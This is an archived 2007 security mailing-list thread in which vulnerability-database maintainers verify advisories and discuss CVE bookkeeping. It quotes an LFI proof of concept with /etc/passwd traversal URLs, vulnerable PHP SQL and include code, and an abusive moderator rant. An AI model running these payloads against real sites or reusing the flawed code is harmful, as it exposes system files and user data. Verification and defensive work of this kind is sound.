
On Thu, 22 Feb 2007, Steven M. Christey wrote:
> On Wed, 21 Feb 2007, security curmudgeon wrote:
>
> > Curious how this came to be. Did someone add a vulnerability to a copy
> > before sharing it and letting it circulate in the warez circles?
>
> I'm pretty sure this wasn't the first, nor the last, case of a
> vulnerability in a Trojaned warez product that wasn't in the legitimate
> product (assuming the vendor dispute is correct).
Maybe some of our > disputes are actually assumintg legitimate distributions. > > I don't think CVE should be tracking malicious modifications from > unofficial channels. Now, if a product is trojaned at its legitimate > distribution point, that's of concern to consumers and gets a CVE. But > modified warez falls under the malware category, for me anyway. Would > OSVDB be interested in cataloging vulnerabilities in malware? They're > technically vulnerabilities from the malware's point of view, after all > ;-) > > Gadi - any insights into warez backdoors? I know I've run into one or two > PHP warez sites out there. Yes, people are already compromised if they get to that point. Usually though there will be other binaries in the directory and use of file infectors would be made. In most other cases the download would be a fake and actually a malware. Of more effect are vulnerabilities in spyware.. > > - Steve > From noamr at beyondsecurity.com Thu Feb 22 05:38:27 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 22 Feb 2007 12:38:27 +0200 Subject: [VIM] [true] phpTrafficA-1.4.1 Local File Inclusion Message-ID: <200702221238.27708.noamr@beyondsecurity.com> Appears to be true, however most PHP installation prevent such abuse as 'open_basedir restriction in effect' by default. ---------- Forwarded Message ---------- Subject: phpTrafficA-1.4.1 Local File Inclusion Date: Wednesday 21 February 2007 21:26 From: "bugtraq ir" To: het_ebadi at yahoo.com phpTrafficA-1.4.1 Local File Inclusion phpTrafficA is a GPL statistical tool for web traffic analysis, written in php and mySQL. It can track access counts to your website, search engines, keywords, and referrers that lead to you, operating systems, web browsers, visitor retention, path analysis, and a lot more! 
http://soft.zoneo.net/phpTrafficA/

Credit:
The information has been provided by Hamid Ebadi
The original article can be found at: http://www.bugtraq.ir

Vulnerable Systems:
Version: phpTrafficA-1.4.1
phpTrafficA-1.4beta4 (also tested on phpTrafficA-1.3)

Description:
Input passed to the "file" parameter in "plotStat.php" and "lang" parameter in "banref.php" is not properly verified, before it is used to include files. This can be exploited to include/see arbitrary files from local resources.

read more about file inclusion in http://www.bugtraq.ir/articles

Vulnerable Code:

//phpTrafficA/plotStat.php
//Vulnerable Code: line 14
if (!isset($file) or $file=="") {$file = $_GET['file'];}
include("./Php/phplot.php");
include("./tmp/".$file);

//phpTrafficA/plotStat.php
//Vulnerable Code: line 16
if (!isset($lang) or $lang == "") {
    $lang = $_GET["lang"];
    if ($lang == "") { $lang = $_POST["lang"];}
}
include ("./Lang/$lang.php");

POC exploit:
The following URL will cause local file inclusion

http://[HOST]/phpTrafficA/plotStat.php?file=/../../../../../../../../../etc/passwd
http://[HOST]/phpTrafficA/banref.php?lang=/../../../../../../../../../etc/passwd%00

# http://www.bugtraq.ir

-------------------------------------------------------
-- 
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
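The two include patterns quoted in the advisory above are the usual local-file-inclusion shape: request input concatenated into an include path, once bare and once with a ".php" suffix appended, which is why the second PoC URL carries a "%00" (on PHP before 5.3.4 a NUL byte truncates the path and drops the suffix). The following is an added example written for this digest, not phpTrafficA's code or the advisory's; it puts the vulnerable concatenation next to a contained version. The directory layout, the file names and the sample requests are assumptions made for the illustration.

```php
<?php
// Added example (not phpTrafficA code). Directory layout, file names and
// sample inputs below are assumptions for the illustration.

// Vulnerable pattern from the advisory: user input is glued onto an include
// path, so "../" walks out of ./tmp. With a fixed suffix appended (the
// ./Lang/$lang.php case) a NUL byte truncates the path on PHP < 5.3.4.
function include_path_vulnerable(string $file): string
{
    return "./tmp/" . $file;   // e.g. ./tmp/../../../../etc/passwd
}

// Contained version: canonicalise with realpath() and require the result to
// stay under the intended directory. NUL bytes are rejected first, because
// realpath() raises a ValueError on them in PHP 8, and a non-existent or
// escaping path comes back as false, so both PoC inputs are refused.
function resolve_contained(string $base, string $name, string $suffix = ''): ?string
{
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $baseReal  = realpath($base);
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name . $suffix);
    if ($baseReal === false || $candidate === false) {
        return null;
    }
    // Compare with a trailing separator so "/app/tmp2/x" is not accepted for "/app/tmp".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// For a small fixed set such as language files an allowlist is simpler and
// stricter than path containment. The language codes are assumed.
function resolve_lang(string $lang): ?string
{
    $allowed = ['en', 'fr', 'de'];
    return in_array($lang, $allowed, true) ? "./Lang/$lang.php" : null;
}

// Demonstration with the inputs from the PoC against a scratch directory.
$base = __DIR__ . '/tmp';
@mkdir($base, 0700, true);
file_put_contents($base . '/stats.dat', "ok\n");

var_dump(resolve_contained($base, 'stats.dat'));                      // path inside tmp
var_dump(resolve_contained($base, '/../../../../../../etc/passwd'));   // NULL: leaves base
var_dump(resolve_contained($base, "../../etc/passwd\0", '.php'));      // NULL: NUL byte
var_dump(resolve_lang("/../../../../etc/passwd\0"));                   // NULL: not allowlisted
var_dump(resolve_lang('en'));                                          // "./Lang/en.php"
```

The open_basedir point Noam makes is a hosting-side mitigation, not a fix: it limits which directories PHP may open, so an uploaded image or a log file inside the permitted tree can still be included; the containment or allowlist check in the application is what actually closes the bug.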
From noamr at beyondsecurity.com Thu Feb 22 05:55:58 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Thu, 22 Feb 2007 12:55:58 +0200
Subject: [VIM] [TRUE] Call Center Software - Remote Xss Post Exploit -
Message-ID: <200702221255.58572.noamr@beyondsecurity.com>

Hi,

Looks real (code):

    $problem_desc = $_POST['problem_desc'];
    if(strlen($name) > 0 && strlen($problem_desc) > 0){
        $sql = "insert into calls (call_date, name, phone, department_id, issue_id, problem_desc) values ";
        $sql .= "('$today', '$name', '$phone', '$department_id', '$issue_id', '$problem_desc')";
        mysql_query($sql);

Meaning that problem_desc is inserted without any kind of filtering, and read without any kind of filtering.

---------- Forwarded Message ----------

Subject: Call Center Software - Remote Xss Post Exploit -
Date: Wednesday 21 February 2007 21:23
From: corrado.liotta at alice.it
To: bugtraq at securityfocus.com

-=[--------------------ADVISORY-------------------]=-
Call center 0,93
Author: CorryL [corryl80 at gmail.com]
-=[-----------------------------------------------]=-

-=[+] Application: Call center
-=[+] Version: 0,93
-=[+] Vendor's URL: http://www.call-center-software.org/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Cross-Site Script
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.xoned.net
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck

..::[ Description ]::..

Call center software is one of the most important aspects of any call help center, being able to track and manage calls can be the key to high customer satisfaction. Our 100% free call center software solution is based on php and the mysql database.

..::[ Bug ]::..

An attacker exploiting this vulnerability is able to steal the cookies of the admin user: the bug is in a POST request, so the payload stays stored inside the database and waits until the admin goes to read the content of the call.

..::[Exploit]::..

[The original post carried an HTML form, stripped by the archive, headed "Call Center" / "Adding Call" with the fields Name, Phone, Department, Issue Type and "Xss Script Here" (the problem_desc field in the code quoted above).]
-------------------------------------------------------
-- 
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com

From noamr at beyondsecurity.com Thu Feb 22 06:22:03 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Thu, 22 Feb 2007 13:22:03 +0200
Subject: [VIM] [TRUE] Nabopoll Blind SQL Injection vulnerabilities
Message-ID: <200702221322.03608.noamr@beyondsecurity.com>

Hi,

Looks like it's true, survey value arrives from $surv which doesn't get filtered for anything when it comes in from the web interface.

Appears to be true, can someone else confirm?

---------- Forwarded Message ----------

Subject: Nabopoll Blind SQL Injection vulnerabilities
Date: Wednesday 21 February 2007 17:40
From: s0cratex at hotmail.com
To: bugtraq at securityfocus.com

Nabopoll has a bug in some files, for example results.php

Line 27...31
--------------------------------
$res_question = mysql_query("select * from nabopoll_questions where survey=$survey order by id");
if ($res_question == FALSE || mysql_numrows($res_question) == 0)
    error($row_survey, "questions not found");
--------------------------------

Exploit
--------------------------------

-------------------------------------------------------
-- 
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com

From noamr at beyondsecurity.com Thu Feb 22 06:23:19 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Thu, 22 Feb 2007 13:23:19 +0200
Subject: [VIM] [TRUE] Nabopoll Blind SQL Injection vulnerabilities (Confirmed)
Message-ID: <200702221323.19897.noamr@beyondsecurity.com>

Hi,

I see that str0ke already confirmed it.

-- 
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com
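The Call Center and Nabopoll snippets quoted in the two threads above are the same class of defect twice: request data interpolated straight into SQL (a quoted string in one, a bare number after `survey=` in the other), and in the Call Center case the stored value later rendered to the admin unencoded. The following is an added example for this digest, not code from either product or advisory. It keeps the table and column names from the quoted snippets and runs against an in-memory SQLite database through PDO so it works stand-alone (PHP 7.4 or later with pdo_sqlite); the sample rows and the submitted values are constructed.

```php
<?php
// Added example (not Call Center Software or Nabopoll code). Table and
// column names follow the snippets quoted in the thread; the rows and the
// submitted values are constructed for the demonstration.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE calls (id INTEGER PRIMARY KEY, call_date TEXT, name TEXT, phone TEXT,
                               department_id INTEGER, issue_id INTEGER, problem_desc TEXT)");
$db->exec("CREATE TABLE nabopoll_questions (id INTEGER PRIMARY KEY, survey INTEGER, text TEXT)");
$db->exec("INSERT INTO nabopoll_questions (survey, text) VALUES (1, 'q1'), (2, 'q2'), (2, 'q3')");

// --- Nabopoll: a numeric value interpolated into the query -----------------

// The pattern from the advisory: $survey is dropped into the SQL text.
// Because it is not quoted, no quote character is needed to break out.
function questions_vulnerable(PDO $db, string $survey): array
{
    return $db->query("select * from nabopoll_questions where survey=$survey order by id")
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: require an integer and bind it as one; the SQL text never changes.
function questions_fixed(PDO $db, string $survey): array
{
    if (!ctype_digit($survey)) {
        return [];   // the advisory's error("questions not found") path
    }
    $stmt = $db->prepare("select * from nabopoll_questions where survey = :survey order by id");
    $stmt->bindValue(':survey', (int) $survey, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Call Center: POST data stored, then shown to the admin ----------------

// Fixed insert: parameters instead of building the statement with strings.
function add_call(PDO $db, array $post): void
{
    $stmt = $db->prepare("insert into calls (call_date, name, phone, department_id, issue_id, problem_desc)
                          values (:d, :n, :p, :dep, :iss, :desc)");
    $stmt->execute([
        ':d'    => date('Y-m-d'),
        ':n'    => $post['name'],
        ':p'    => $post['phone'],
        ':dep'  => (int) $post['department_id'],
        ':iss'  => (int) $post['issue_id'],
        ':desc' => $post['problem_desc'],   // stored verbatim; encoding belongs at output
    ]);
}

// Fixed output: HTML-encode at the point of rendering, for every field.
function render_call(array $row): string
{
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<p>' . $e($row['name']) . ' (' . $e($row['phone']) . '): ' . $e($row['problem_desc']) . '</p>';
}

// Demonstration with constructed input.
echo count(questions_vulnerable($db, '1')), " row(s) for survey 1\n";            // 1
echo count(questions_vulnerable($db, '1 or 1=1')), " row(s) with injection\n";   // 3: WHERE rewritten
echo count(questions_fixed($db, '1 or 1=1')), " row(s) after the fix\n";         // 0: rejected
echo count(questions_fixed($db, '2')), " row(s) for survey 2 after the fix\n";   // 2

add_call($db, [
    'name' => 'Bob', 'phone' => '555-0100', 'department_id' => '1', 'issue_id' => '2',
    'problem_desc' => '<script>alert(1)</script>',
]);
$row = $db->query("select * from calls")->fetch(PDO::FETCH_ASSOC);
echo render_call($row), "\n";   // the tag is emitted as text, not markup
```

The two fixes are deliberately separate: binding parameters stops the query from being rewritten, and encoding at render time stops stored content from being interpreted as markup. Escaping on the way into the database does neither job reliably, since the same value may later be rendered in more than one context.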
From coley at mitre.org Thu Feb 22 14:22:19 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 22 Feb 2007 14:22:19 -0500 (EST)
Subject: [VIM] "Phil's Bookmark" looks, smells site-specific
Message-ID: <200702221922.l1MJMJ9P009648@faron.mitre.org>

I'm cleaning out leftover 2006 references for CVE, which is why I'm posting about so many old issues.

Refs:

Phil's Bookmark script admin By-pass
http://www.securityfocus.com/archive/1/archive/1/433222/30/5130/threaded

I followed up asking "is this site-specific"?
http://www.securityfocus.com/archive/1/archive/1/433441/30/5100/threaded

The response here:
http://www.securityfocus.com/archive/1/archive/1/433869/30/5040/threaded

was "Yes, there really is an issue here. If you take time and don't just look at the first 2-3 pages in google. Phil's Bookmark is a bookmark script."

Naturally, there was no actual URL provided.

So Googling about I was only able to find this:

Phil's Bookmark Thingy
www.baskette.com/bookmarks/index.php?showall=1

Looking around, you can see various successful hacks. So the issue is real, anyway. In an ironic twist, someone (perhaps not Phil) added links to various internet security sites.

The page appears to be run by a guy named Phil. There is no contact information, otherwise I'd send an inquiry.

Google doesn't return any more results for "Phil's Bookmark script" besides the Bugtraq post and related messages. I looked through everything.

So, I'm thinking site-specific here.

- Steve

From coley at mitre.org Thu Feb 22 19:29:29 2007
From: coley at mitre.org (Steven M. Christey)
Date: Thu, 22 Feb 2007 19:29:29 -0500 (EST)
Subject: [VIM] Nomadic IBM APAR's
Message-ID: <200702230029.l1N0TTnC015419@faron.mitre.org>

All,

The following URL:

http://www-1.ibm.com/support/docview.wss?uid=swg1IY94817

Used to be for APAR IY94817, but now it's 404. Apparently it moved here:

http://www-1.ibm.com/support/docview.wss?uid=swg21255747

Although under "Related information" they refer to their own broken link.

Lately, I've been running across these nomadic URLs in IBM's web site more frequently. Once upon a time, you could plug an [APAR] number into the following and get something:

http://www-1.ibm.com/support/search.wss?rs=0&q=[APAR]&apar=only

but this isn't always working, and neither does the "Search" button at the top always work.

How do other people deal with this?

Oh, by the way - there's a slight inconsistency between what IY94817 *used to say* and what iDEFENSE is saying in their "IBM DB2 Universal Database DB2INSTANCE File Creation Vulnerability" advisory, i.e. IY94817 mentions symlinks but iDEFENSE does not. The old IY94817 said:

"SECURITY: DB2DIAG.LOG SYMBOLIC LINK OVERWRITE VULNERABILITY... A vulnerability exists in several set-uid DB2 binaries that can be exploited by a local user. The vulnerability allows a local user to write to any file on the system through the use of symbolic links (also known as symlinks or soft links). This problem does not affect Windows systems."

The new version refers to a buffer overflow and a "symlink overwrite."

- Steve

From jericho at attrition.org Thu Feb 22 19:42:48 2007
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 22 Feb 2007 19:42:48 -0500 (EST)
Subject: [VIM] Nomadic IBM APAR's
In-Reply-To: <200702230029.l1N0TTnC015419@faron.mitre.org>
References: <200702230029.l1N0TTnC015419@faron.mitre.org>
Message-ID:

: Lately, I've been running across these nomadic URLs in IBM's web site
: more frequently.

I know you and I have had this conversation at least once in the past. IBM's site is getting increasingly more user unfriendly.

: How do other people deal with this?

I always leave snide remarks in the feedback box for starters. Any document I load that doesn't refer to the corresponding CVE entry gets a snarky comment for sure.

From theall at tenablesecurity.com Thu Feb 22 22:31:23 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 22 Feb 2007 22:31:23 -0500
Subject: [VIM] Verisign ConfigChk ActiveX Overflow(s)
Message-ID: <45DE600B.7000305@tenablesecurity.com>

Has anyone determined if there are any differences between the buffer overflow covered by US-CERT's VU#308087 and iDefense's advisory #479? Both involve the VerCompare() method of Verisign's Configuration Checker ActiveX. SecurityFocus has two BIDs: 22671 and 22676 respectively.

There's an acknowledgement from Verisign of what appears to be a single issue (ie, "VeriSign has discovered *a* buffer overrun security vulnerability", emphasis mine) here:

http://www.verisign.com/support/advisories/page_040740.html

George
-- 
theall at tenablesecurity.com

From coley at linus.mitre.org Fri Feb 23 13:45:53 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 23 Feb 2007 13:45:53 -0500 (EST)
Subject: [VIM] Verisign ConfigChk ActiveX Overflow(s)
In-Reply-To: <45DE600B.7000305@tenablesecurity.com>
References: <45DE600B.7000305@tenablesecurity.com>
Message-ID:

> Has anyone determined if there are any differences between the buffer
> overflow covered by US-CERT's VU#308087 and iDefense's advisory #479.
> Both involve the VerCompare() method of the Verisign's Configuration
> Checker ActiveX? SecurityFocus has two BIDs: 22671 and 22676 respectively.

I decided to merge these in CVE. The correlating data was too close. And given that the iDEFENSE advisory mentioned there were 2 arguments for VerCompare(), there isn't much room for different issues. There only seems to be one patch coming from Verisign in this time frame. Now, iDefense might have mistakenly assumed this was a fix for their vuln - research orgs sometimes do that - but still, there are other correlators.

> There's an acknowledgement from Verisign of what appears to be a single
> issue (ie, "VeriSign has discovered *a* buffer overrun security
> vulnerability", emphasis mine) here:
>
> http://www.verisign.com/support/advisories/page_040740.html

In CVE, we'll frequently note - but otherwise dismiss - when vendors talk about "a" vuln because there are frequently multiple issues. Everybody counts vulns differently, vendors least of all. Though it is strange that they say *they* discovered it.

- Steve

From smoore at securityglobal.net Fri Feb 23 17:07:42 2007
From: smoore at securityglobal.net (Stuart Moore)
Date: Fri, 23 Feb 2007 17:07:42 -0500
Subject: [VIM] Verisign ConfigChk ActiveX Overflow(s)
In-Reply-To:
References: <45DE600B.7000305@tenablesecurity.com>
Message-ID: <45DF65AE.1090709@securityglobal.net>

Steve,

iDefense is owned by VeriSign, so, "they" did indeed discover a vulnerability in their own product.

Stuart

Steven M. Christey wrote:
>
>> Has anyone determined if there are any differences between the buffer
>> overflow covered by US-CERT's VU#308087 and iDefense's advisory #479.
>> Both involve the VerCompare() method of the Verisign's Configuration
>> Checker ActiveX? SecurityFocus has two BIDs: 22671 and 22676 respectively.
>
> I decided to merge these in CVE. The correlating data was too close.
> And given that the iDEFENSE advisory mentioned there were 2 arguments for
> VerCompare(), there isn't much room for different issues. There only
> seems to be one patch coming from Verisign in this time frame. Now,
> iDefense might have mistakenly assumed this was a fix for their vuln -
> research orgs sometimes do that - but still, there are other correlators.
>
>> There's an acknowledgement from Verisign of what appears to be a single
>> issue (ie, "VeriSign has discovered *a* buffer overrun security
>> vulnerability", emphasis mine) here:
>>
>> http://www.verisign.com/support/advisories/page_040740.html
>
> In CVE, we'll frequently note - but otherwise dismiss - when vendors talk
> about "a" vuln because there are frequently multiple issues. Everybody
> counts vulns differently, vendors least of all. Though it is strange that
> they say *they* discovered it.
>
> - Steve

From jericho at attrition.org Fri Feb 23 22:05:29 2007
From: jericho at attrition.org (security curmudgeon)
Date: Fri, 23 Feb 2007 22:05:29 -0500 (EST)
Subject: [VIM] CVE-2007-0392 Dispute
Message-ID:

CVE-2007-0392 (and 0393, 0394) comes from:

http://archives.neohapsis.com/archives/bugtraq/2007-01/0430.html

Replies went to both Bugtraq and F-D, but not always to both.

There are two specific replies suggesting AIX is not vulnerable:

http://archives.neohapsis.com/archives/bugtraq/2007-01/0465.html
http://archives.neohapsis.com/archives/bugtraq/2007-01/0480.html

From jericho at attrition.org Sat Feb 24 08:09:03 2007
From: jericho at attrition.org (security curmudgeon)
Date: Sat, 24 Feb 2007 08:09:03 -0500 (EST)
Subject: [VIM] [OSVDB Mods] OSVDB: Comment Awaiting Moderation
In-Reply-To: <20070224125047.8C1A181AE4@forced.attrition.org>
References: <20070224125047.8C1A181AE4@forced.attrition.org>
Message-ID:

: A new comment is awaiting moderation. Please review:
: Author: www.phppeanuts.org (82.73.107.143)
: OSVDB-ID: 30397
: Comment: Your description states "Currently, there are no known
: upgrades, patches, or workarounds available to correct this
: issue."
:
: In fact a patch as well as patched versions
: have been available for download since 16-11-2006. Unpatched versions
: have not been available for download from our website since that date.
:
: You forget to mention that the vulnerability was in a
: helper file of the unit testing tool, something that is normally not
: placed on line and certainly not without password-controlled access. The
: phppeanuts demonstration site was probably the only site that was
: actually vulnerable to the public.
:
: The unit testing tool
: does not use the framework for its own execution. The framework itself
: has not been hacked.
:
: The information about the patch has
: been on the homepage of our website since that date, which is several
: days before your last update date. Why did you not ask us for
: information about the vulnerability? Why did you not inform us about the
: information you are publishing here?
:
: Please correct your
: information.

We forget to mention blah blah blah? We know NOTHING about your product other than what was originally posted to http://www.milw0rm.com/exploits/2778. The original point of disclosure says nothing about "unpatched versions", "helper files", "unit testing tools" or what was or was not placed online with or without password-controlled access.

We didn't ask you for details of this because we didn't disclose the vulnerability. We didn't ask you for details because we attempt to monitor over *100 HUNDRED VULNERABILITIES PUBLISHED DAILY* and don't have the time or resources to contact each vendor, hold their hand, change their diaper and gently stroke them as they write shoddy code and introduce vulnerabilities in their products, be it in their own web sites, demo web sites or downloadable packages.

We will correct our information when you get a fucking clue, treat us with the respect you think we owe you, and get over your pathetic egos when it comes to writing secure code. Until then, whine like a bitch to milw0rm.com for posting this before we did, then whine to IBM (x-force), CVE (cve.mitre.org), Symantec (BID), Secunia and FR-SiRT, all commercial companies or government sponsored projects, before you go whining to the non-profit volunteer run OSVDB.org. When you do that, or send us a *reasonable* mail that isn't accusing us of some wrong-doing, THEN we will consider updating our entry with information pertaining to this vulnerability.

Until then, kindly lick my asshole clean. We clear?
Brian
OSVDB.org

From jericho at attrition.org Sat Feb 24 08:16:20 2007
From: jericho at attrition.org (security curmudgeon)
Date: Sat, 24 Feb 2007 08:16:20 -0500 (EST)
Subject: [VIM] [OSVDB Mods] Re: Lame Gimmicks (fwd)
Message-ID:

re: Rixstep thread on Full-Disclosure:

http://archives.neohapsis.com/archives/fulldisclosure/2007-01/thread.html#283
http://archives.neohapsis.com/archives/fulldisclosure/2007-01/thread.html#304
http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0414.html
http://archives.neohapsis.com/archives/fulldisclosure/2007-01/thread.html#415

Shortly after the original post in all that mess, I posted a blog entry to the OSVDB blog questioning who Rixstep was and why they mattered in the grand scheme of the "Month of X bugs" trend (in so many words):

http://osvdb.org/blog/?p=160

In response to this blog entry, they decided not to post a reply on the blog, but to specifically contact Jake, and only Jake, with a reply. Jake belatedly replied to them with confusion, since he was swamped with his day job and had no knowledge of my blog entry. They quickly replied.. time passed.. I replied, and Rixstep replied not even two hours later, suggesting I had no life or nothing better to do.

Fuckers, now I have to go dig up the entire mail thread with time stamps just to prove how lame these people are, and just how insignificant they really are. Adding this to the ever growing to-do list, after items I added three or more months ago on this list.

---------- Forwarded message ----------
From: security curmudgeon
To: contact at rixstep.com
Cc: OSVDB Mods
Date: Sat, 24 Feb 2007 07:57:09 -0500 (EST)
Reply-To: moderators at osvdb.org
Subject: [OSVDB Mods] Re: Lame Gimmicks

On Sat, 24 Feb 2007, contact at rixstep.com wrote:

: Christ Jesus you wee tosser - you got nothing better to do?
:
: You really have personality issues, don't you?

LOL

I'm busy with my day job and providing security solutions to my clients for the past few months causing my mails and replies to be considerably late. I *finally* get around to catching up on my *hobby* project (OSVDB.org) and send a quick mail to you and Jake (who you whined to even though he had nothing to do with the original comments). In return, not even two HOURS later, after my two MONTH late response, I receive this reply?

If I post this thread in full, who do you think will come across as not having anything better to do or having 'personality issues'?

Before you respond, consider that I have spent 10 minutes a month for the last 10 years pointing out the charlatans in the security industry. What has Rixstep been doing for the past ten years? I'll gladly take on the title of 'tosser' if you will agree to take on the title of 'charlatan'. Deal?

Jericho

From coley at mitre.org Sat Feb 24 16:51:40 2007
From: coley at mitre.org (Steven M. Christey)
Date: Sat, 24 Feb 2007 16:51:40 -0500 (EST)
Subject: [VIM] Vendor ACK for CVE-2006-3832 (loudblog SQL injection)
Message-ID: <200702242151.l1OLpeTG009392@faron.mitre.org>

CONFIRM:http://loudblog.de/forum/viewtopic.php?id=762
CONFIRM:http://loudblog.de/forum/viewtopic.php?id=770

- Steve

From jericho at attrition.org Mon Feb 26 01:12:21 2007
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 26 Feb 2007 01:12:21 -0500 (EST)
Subject: [VIM] OT: Humor - Vulnerability News Spoof
Message-ID:

Apologies to everyone for my attempted humorous spoof =)

--

MITRE Announces No New Vulnerabilities in 2006

FOR IMMEDIATE RELEASE

MITRE Contacts:
Steven "False Again" Christey
Bill "That's False Too!" Heinbockel

Bedford, Massachusetts, January 15, 2007 -- The MITRE Corporation announced today after extensive analysis that no new vulnerabilities were published in 2006.

Throughout the year of 2006, the ongoing debate between full disclosure and responsible disclosure became completely moot. With 6,387 unique vulnerability reports made, almost every single one has since been proven a false reporting.

"We at CVE have gone over the data and source code for 6,387 vulnerability disclosures and have concluded that 6,386 were incorrect and that no vulnerability was present. For the 1 report not labeled false, the path disclosure issue affected CertBlog 0.3beta if every PHP option was enabled and the administrator copied installation files back after they were deleted by the program." says CVE lead Steven Christey.

Given the severity of the information, MITRE's CVE collaborated with other industry leaders SecurityTracker, milw0rm, Securiteam and OSVDB to validate these findings. "Unbelievable" was all str0ke could say about the previous year's disclosures. "Like any of us are really surprised?" replied Martin, suggesting that this was bound to happen.

As of the time of this press release, there have been no valid vulnerabilities disclosed in 2007 either.

From jericho at attrition.org Mon Feb 26 07:20:30 2007
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 26 Feb 2007 07:20:30 -0500 (EST)
Subject: [VIM] IBM ISS 2006 Threat Review
Message-ID:

Interesting/relevant info from the IBM/ISS 2006 Trend Statistics. Discuss, debate or ponder as you please.

http://www.iss.net/documents/whitepapers/X_Force_Exec_Brief.pdf

Vulnerabilities

* There were a total of 7,247 vulnerabilities in 2006, which represents a 39.5 percent increase over 2005.
* June was the busiest month of the year with 696 vulnerabilities.
* Week 46 (the week before Thanksgiving) was the busiest week of 2006 for new vulnerabilities.
* The most popular day for vulnerability disclosures was Tuesday.
* Weekend disclosure of vulnerabilities in 2006 more than doubled that of 2005 to reach 17.6 percent of all disclosures.
* High impact vulnerabilities continue to decrease as a percentage of total vulnerabilities in 2006.
* 3 percent of vulnerabilities under the Common Vulnerability Scoring System (CVSS) were evaluated as being critical impact vulnerabilities with a score of 10.
* The top three vulnerable vendors in 2006 were Microsoft, Oracle and Apple.
* The top 10 vulnerable software vendors accounted for 14 percent of all 2006 vulnerabilities.
* 17 percent of the vulnerabilities identified within the top 10 vulnerable vendors' products were un-patched at the end of 2006. This contrasts with 65 percent un-patched for all other vulnerabilities recorded in the year.
* 88.4 percent of all 2006 vulnerabilities could be exploited remotely.
* Over half (50.6 percent) of 2006 vulnerabilities would allow an attacker to gain access to the host after successful exploitation.

From str0ke at milw0rm.com Mon Feb 26 09:29:56 2007
From: str0ke at milw0rm.com (str0ke)
Date: Mon, 26 Feb 2007 08:29:56 -0600
Subject: [VIM] OT: Humor - Vulnerability News Spoof
In-Reply-To:
References:
Message-ID: <814b9d50702260629h7ebe47dbl4eb0e330fbca1b9c@mail.gmail.com>

Unbelievable

On 2/26/07, security curmudgeon wrote:
>
> Apologies to everyone for my attempted humorous spoof =)
>
> --
>
> MITRE Announces No New Vulnerabilities in 2006
>
> FOR IMMEDIATE RELEASE
>
> MITRE Contacts:
> Steven "False Again" Christey
> Bill "That's False Too!" Heinbockel
>
> Bedford, Massachusetts, January 15, 2007 -- The MITRE Corporation
> announced today after extensive analysis that no new vulnerabilities were
> published in 2006.
>
> Throughout the year of 2006, the ongoing debate between full disclosure
> and responsible disclosure became completely moot. With 6,387 unique
> vulnerability reports made, almost every single one has since been proven
> a false reporting.
>
> "We at CVE have gone over the data and source code for 6,387 vulnerability
> disclosures and have concluded that 6,386 were incorrect and that no
> vulnerability was present. For the 1 report not labeled false, the path
> disclosure issue affected CertBlog 0.3beta if every PHP option was enabled
> and the administrator copied installation files back after they were
> deleted by the program." says CVE lead Steven Christey.
>
> Given the severity of the information, MITRE's CVE collaborated with other
> industry leaders SecurityTracker, milw0rm, Securiteam and OSVDB to
> validate these findings. "Unbelievable" was all str0ke could say about the
> previous year's disclosures. "Like any of us are really surprised?"
> replied Martin, suggesting that this was bound to happen.
>
> As of the time of this press release, there have been no valid
> vulnerabilities disclosed in 2007 either.

From coley at linus.mitre.org Tue Feb 27 03:17:04 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Tue, 27 Feb 2007 03:17:04 -0500 (EST)
Subject: [VIM] IBM ISS 2006 Threat Review
In-Reply-To:
References:
Message-ID:

Ooooh, an opportunity to procrastinate and pontificate! I'll byte.

On Mon, 26 Feb 2007, security curmudgeon wrote:

> Interesting/relevant info from the IBM/ISS 2006 Trend Statistics. Discuss,
> debate or ponder as you please.

DISCLAIMER: PONDERING ONLY. I'm using rough stats only.

> * There were a total of 7,247 vulnerabilities in 2006, which represents a
> 39.5 percent increase over 2005.

I just realized another bias: we get better every year at tracking vulns - there are more sources, and we get faster at cataloging obvious stuff. CVE has been pretty open about this change, but I bet it happens to all VDBs. Thus growth is (perhaps) slightly less than our stats would show, assuming we're not getting worse at tracking things.

> * June was the busiest month of the year with 696 vulnerabilities.

In CVE too, at 688 so far. Feb was slowest at 492, but normalizing by number of days in each month, July was slowest (505, making for 16.3 per day).

> * The most popular day for vulnerability disclosures was Tuesday.

